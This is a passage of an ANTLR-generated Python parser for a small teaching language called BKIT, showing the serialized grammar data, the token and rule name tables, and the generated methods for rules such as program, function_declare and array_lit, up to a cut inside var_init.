buf.write(\"\\2\\u015c\\u015d\\5<\\37\\2\\u015d\\u0163\\3\\2\\2\\2\\u015e\\u015f\")\n buf.write(\"\\f\\4\\2\\2\\u015f\\u0160\\7\\7\\2\\2\\u0160\\u0162\\5<\\37\\2\\u0161\")\n buf.write(\"\\u015e\\3\\2\\2\\2\\u0162\\u0165\\3\\2\\2\\2\\u0163\\u0161\\3\\2\\2\\2\")\n buf.write(\"\\u0163\\u0164\\3\\2\\2\\2\\u0164;\\3\\2\\2\\2\\u0165\\u0163\\3\\2\\2\")\n buf.write(\"\\2\\u0166\\u0167\\7\\b\\2\\2\\u0167\\u016a\\5<\\37\\2\\u0168\\u016a\")\n buf.write(\"\\5> \\2\\u0169\\u0166\\3\\2\\2\\2\\u0169\\u0168\\3\\2\\2\\2\\u016a=\")\n buf.write(\"\\3\\2\\2\\2\\u016b\\u016c\\7\\t\\2\\2\\u016c\\u016f\\5> \\2\\u016d\\u016f\")\n buf.write(\"\\5@!\\2\\u016e\\u016b\\3\\2\\2\\2\\u016e\\u016d\\3\\2\\2\\2\\u016f?\")\n buf.write(\"\\3\\2\\2\\2\\u0170\\u0171\\5B\\\"\\2\\u0171\\u0172\\5J&\\2\\u0172\\u0175\")\n 
buf.write(\"\\3\\2\\2\\2\\u0173\\u0175\\5B\\\"\\2\\u0174\\u0170\\3\\2\\2\\2\\u0174\")\n buf.write(\"\\u0173\\3\\2\\2\\2\\u0175A\\3\\2\\2\\2\\u0176\\u0179\\5H%\\2\\u0177\")\n buf.write(\"\\u0179\\5D#\\2\\u0178\\u0176\\3\\2\\2\\2\\u0178\\u0177\\3\\2\\2\\2\\u0179\")\n buf.write(\"C\\3\\2\\2\\2\\u017a\\u0180\\5F$\\2\\u017b\\u017c\\7:\\2\\2\\u017c\\u017d\")\n buf.write(\"\\5\\64\\33\\2\\u017d\\u017e\\7;\\2\\2\\u017e\\u0180\\3\\2\\2\\2\\u017f\")\n buf.write(\"\\u017a\\3\\2\\2\\2\\u017f\\u017b\\3\\2\\2\\2\\u0180E\\3\\2\\2\\2\\u0181\")\n buf.write(\"\\u0185\\5\\20\\t\\2\\u0182\\u0185\\5\\n\\6\\2\\u0183\\u0185\\5\\f\\7\")\n buf.write(\"\\2\\u0184\\u0181\\3\\2\\2\\2\\u0184\\u0182\\3\\2\\2\\2\\u0184\\u0183\")\n buf.write(\"\\3\\2\\2\\2\\u0185G\\3\\2\\2\\2\\u0186\\u0187\\7\\3\\2\\2\\u0187\\u0192\")\n buf.write(\"\\7:\\2\\2\\u0188\\u018d\\5\\64\\33\\2\\u0189\\u018a\\7C\\2\\2\\u018a\")\n buf.write(\"\\u018c\\5\\64\\33\\2\\u018b\\u0189\\3\\2\\2\\2\\u018c\\u018f\\3\\2\\2\")\n buf.write(\"\\2\\u018d\\u018b\\3\\2\\2\\2\\u018d\\u018e\\3\\2\\2\\2\\u018e\\u0191\")\n buf.write(\"\\3\\2\\2\\2\\u018f\\u018d\\3\\2\\2\\2\\u0190\\u0188\\3\\2\\2\\2\\u0191\")\n buf.write(\"\\u0194\\3\\2\\2\\2\\u0192\\u0190\\3\\2\\2\\2\\u0192\\u0193\\3\\2\\2\\2\")\n buf.write(\"\\u0193\\u0195\\3\\2\\2\\2\\u0194\\u0192\\3\\2\\2\\2\\u0195\\u0196\\7\")\n buf.write(\";\\2\\2\\u0196I\\3\\2\\2\\2\\u0197\\u0198\\7<\\2\\2\\u0198\\u0199\\5\")\n buf.write(\"\\64\\33\\2\\u0199\\u019a\\7=\\2\\2\\u019a\\u01a1\\3\\2\\2\\2\\u019b\")\n buf.write(\"\\u019c\\7<\\2\\2\\u019c\\u019d\\5\\64\\33\\2\\u019d\\u019e\\7=\\2\\2\")\n buf.write(\"\\u019e\\u019f\\5J&\\2\\u019f\\u01a1\\3\\2\\2\\2\\u01a0\\u0197\\3\\2\")\n buf.write(\"\\2\\2\\u01a0\\u019b\\3\\2\\2\\2\\u01a1K\\3\\2\\2\\2)QWfou\\u0084\\u0089\")\n buf.write(\"\\u008d\\u0090\\u0096\\u009b\\u009f\\u00a8\\u00ab\\u00b4\\u00bc\")\n buf.write(\"\\u00bf\\u00c4\\u00d3\\u00db\\u00e1\\u00f7\\u0104\\u0109\\u012f\")\n 
buf.write(\"\\u013c\\u0143\\u014d\\u0158\\u0163\\u0169\\u016e\\u0174\\u0178\")\n buf.write(\"\\u017f\\u0184\\u018d\\u0192\\u01a0\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \n \"'ElseIf'\", \"'EndIf'\", \"'EndBody'\", \"'EndFor'\", \"'EndWhile'\", \n \"'For'\", \"'Function'\", \"'If'\", \"'Parameter'\", \"'Return'\", \n \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", \"'False'\", \n \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \"'*'\", \"'*.'\", \n \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \"'=='\", \n \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=/='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \n \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\", \"'\\\"'\", \n \"'int_of_float'\", \"'int_of_string'\", \"'float_to_int'\", \n \"'float_of_string'\", \"'bool_of_string'\", \"'string_of_bool'\", \n \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"REL_OP\", \"BIN_LOGICAL_OP\", \"ADD_OP\", \n \"MUL_OP\", \"UN_LOGICAL_OP\", \"UN_OP\", \"INT_LIT\", \"FLOAT_LIT\", \n \"BOOL_LIT\", \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \n \"DO\", \"ELSE\", \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \n \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", 
\"DIV_FLOAT\", \n \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \n \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \n \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \n \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \n \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_array = 3\n RULE_primitive_data = 4\n RULE_array_lit = 5\n RULE_var_list = 6\n RULE_var_non_init = 7\n RULE_composite_var = 8\n RULE_var_init = 9\n RULE_composite_init = 10\n RULE_primitive_init = 11\n RULE_params_list = 12\n RULE_stmt_list = 13\n RULE_stmt = 14\n RULE_if_stmt = 15\n RULE_var_declare_stmt = 16\n RULE_for_stmt = 17\n RULE_while_stmt = 18\n RULE_dowhile_stmt = 19\n RULE_assign_stmt = 20\n RULE_break_stmt = 21\n RULE_continue_stmt = 22\n RULE_call_stmt = 23\n RULE_return_stmt = 24\n RULE_expr = 25\n RULE_expr1 = 26\n RULE_expr2 = 27\n RULE_expr3 = 28\n RULE_expr4 = 29\n RULE_expr5 = 30\n RULE_expr6 = 31\n RULE_expr7 = 32\n RULE_expr8 = 33\n RULE_operand = 34\n RULE_function_call = 35\n RULE_index_op = 36\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"array\", \n \"primitive_data\", \"array_lit\", \"var_list\", \"var_non_init\", \n \"composite_var\", \"var_init\", \"composite_init\", \"primitive_init\", \n \"params_list\", \"stmt_list\", \"stmt\", \"if_stmt\", \"var_declare_stmt\", \n \"for_stmt\", \"while_stmt\", \"dowhile_stmt\", \"assign_stmt\", \n \"break_stmt\", \"continue_stmt\", \"call_stmt\", \"return_stmt\", \n 
\"expr\", \"expr1\", \"expr2\", \"expr3\", \"expr4\", \"expr5\", \n \"expr6\", \"expr7\", \"expr8\", \"operand\", \"function_call\", \n \"index_op\" ]\n\n EOF = Token.EOF\n ID=1\n REL_OP=2\n BIN_LOGICAL_OP=3\n ADD_OP=4\n MUL_OP=5\n UN_LOGICAL_OP=6\n UN_OP=7\n INT_LIT=8\n FLOAT_LIT=9\n BOOL_LIT=10\n STRING_LIT=11\n BODY=12\n BREAK=13\n CONTINUE=14\n DO=15\n ELSE=16\n ELSEIF=17\n ENDIF=18\n ENDBODY=19\n ENDFOR=20\n ENDWHILE=21\n FOR=22\n FUNCTION=23\n IF=24\n PARAMETER=25\n RETURN=26\n THEN=27\n VAR=28\n WHILE=29\n TRUE=30\n FALSE=31\n ENDDO=32\n PLUS_INT=33\n PLUS_FLOAT=34\n MINUS_INT=35\n MINUS_FLOAT=36\n STAR_INT=37\n STAR_FLOAT=38\n DIV_INT=39\n DIV_FLOAT=40\n MOD=41\n NOT=42\n AND=43\n OR=44\n EQUAL=45\n NOT_EQUAL_INT=46\n LESS_INT=47\n GREATER_INT=48\n LESS_OR_EQUAL_INT=49\n GREATER_OR_EQUAL_INT=50\n NOT_EQUAL_FLOAT=51\n LESS_FLOAT=52\n GREATER_FLOAT=53\n LESS_OR_EQUAL_FLOAT=54\n GREATER_OR_EQUAL_FLOAT=55\n LEFT_PAREN=56\n RIGHT_PAREN=57\n LEFT_BRACKET=58\n RIGHT_BRACKET=59\n LEFT_BRACE=60\n RIGHT_BRACE=61\n COLON=62\n DOT=63\n SEMI=64\n COMMA=65\n ASSIGN=66\n DOUBLE_QUOTE=67\n INT_OF_FLOAT=68\n INT_OF_STRING=69\n FLOAT_TO_INT=70\n FLOAT_OF_STRING=71\n BOOL_OF_STRING=72\n STRING_OF_BOOL=73\n STRING_OF_INT=74\n STRING_OF_FLOAT=75\n COMMENT=76\n WS=77\n ILLEGAL_ESCAPE=78\n UNCLOSE_STRING=79\n UNTERMINATED_COMMENT=80\n ERROR_CHAR=81\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n 
else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 79\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 74\n self.var_declare()\n self.state = 75\n self.match(BKITParser.SEMI)\n self.state = 81\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 85\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.FUNCTION:\n self.state = 82\n self.function_declare()\n self.state = 87\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 88\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def COLON(self):\n return self.getToken(BKITParser.COLON, 0)\n\n def var_list(self):\n return self.getTypedRuleContext(BKITParser.Var_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n\n\n\n def var_declare(self):\n\n localctx = 
BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 90\n self.match(BKITParser.VAR)\n self.state = 91\n self.match(BKITParser.COLON)\n self.state = 92\n self.var_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def params_list(self):\n return self.getTypedRuleContext(BKITParser.Params_listContext,0)\n\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n\n\n\n def function_declare(self):\n\n localctx = 
BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 94\n self.match(BKITParser.FUNCTION)\n self.state = 95\n self.match(BKITParser.COLON)\n self.state = 96\n self.match(BKITParser.ID)\n self.state = 100\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.PARAMETER:\n self.state = 97\n self.match(BKITParser.PARAMETER)\n self.state = 98\n self.match(BKITParser.COLON)\n self.state = 99\n self.params_list()\n\n\n self.state = 102\n self.match(BKITParser.BODY)\n self.state = 103\n self.match(BKITParser.COLON)\n self.state = 109\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 104\n self.var_declare_stmt()\n self.state = 105\n self.match(BKITParser.SEMI)\n self.state = 111\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 115\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.BREAK) | (1 << BKITParser.CONTINUE) | (1 << BKITParser.DO) | (1 << BKITParser.FOR) | (1 << BKITParser.IF) | (1 << BKITParser.RETURN) | (1 << BKITParser.WHILE))) != 0):\n self.state = 112\n self.stmt()\n self.state = 117\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 118\n self.match(BKITParser.ENDBODY)\n self.state = 119\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return 
self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 121\n self.match(BKITParser.ID)\n self.state = 122\n self.match(BKITParser.ASSIGN)\n self.state = 123\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT_LIT(self):\n return self.getToken(BKITParser.INT_LIT, 0)\n\n def FLOAT_LIT(self):\n return self.getToken(BKITParser.FLOAT_LIT, 0)\n\n def STRING_LIT(self):\n return self.getToken(BKITParser.STRING_LIT, 0)\n\n def BOOL_LIT(self):\n return self.getToken(BKITParser.BOOL_LIT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_data\n\n\n\n\n def primitive_data(self):\n\n localctx = BKITParser.Primitive_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_primitive_data)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 125\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return 
localctx\n\n\n class Array_litContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def primitive_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,i)\n\n\n def array_lit(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Array_litContext)\n else:\n return self.getTypedRuleContext(BKITParser.Array_litContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_lit\n\n\n\n\n def array_lit(self):\n\n localctx = BKITParser.Array_litContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_array_lit)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 127\n self.match(BKITParser.LEFT_BRACE)\n self.state = 142\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 130\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 128\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 129\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 139\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state 
= 132\n self.match(BKITParser.COMMA)\n self.state = 135\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 133\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 134\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 141\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n\n\n self.state = 144\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def var_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_list\n\n\n\n\n def var_list(self):\n\n localctx = BKITParser.Var_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_var_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 148\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,9,self._ctx)\n if la_ == 1:\n self.state = 146\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 147\n self.var_init()\n pass\n\n\n self.state = 157\n 
self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 150\n self.match(BKITParser.COMMA)\n self.state = 153\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.state = 151\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 152\n self.var_init()\n pass\n\n\n self.state = 159\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_non_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_non_init\n\n\n\n\n def var_non_init(self):\n\n localctx = BKITParser.Var_non_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_var_non_init)\n try:\n self.state = 169\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,13,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 160\n self.match(BKITParser.ID)\n self.state = 164 \n self._errHandler.sync(self)\n _alt = 1\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt == 1:\n self.state = 161\n 
self.match(BKITParser.LEFT_BRACKET)\n self.state = 162\n self.match(BKITParser.INT_LIT)\n self.state = 163\n self.match(BKITParser.RIGHT_BRACKET)\n\n else:\n raise NoViableAltException(self)\n self.state = 166 \n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,12,self._ctx)\n\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 168\n self.match(BKITParser.ID)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_var\n\n\n\n\n def composite_var(self):\n\n localctx = BKITParser.Composite_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_composite_var)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 171\n self.match(BKITParser.ID)\n self.state = 176 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 172\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 173\n self.expr()\n self.state = 174\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 178 \n 
self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_init\n\n\n\n\n def var_init(self):\n\n localctx = BKITParser.Var_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_var_init)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 189\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,16,self._ctx)\n if la_ == 1:\n self.state = 180\n self.match(BKITParser.ID)\n self.state = 184 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 181\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 182\n self.match(BKITParser.INT_LIT)\n self.state = 183\n 
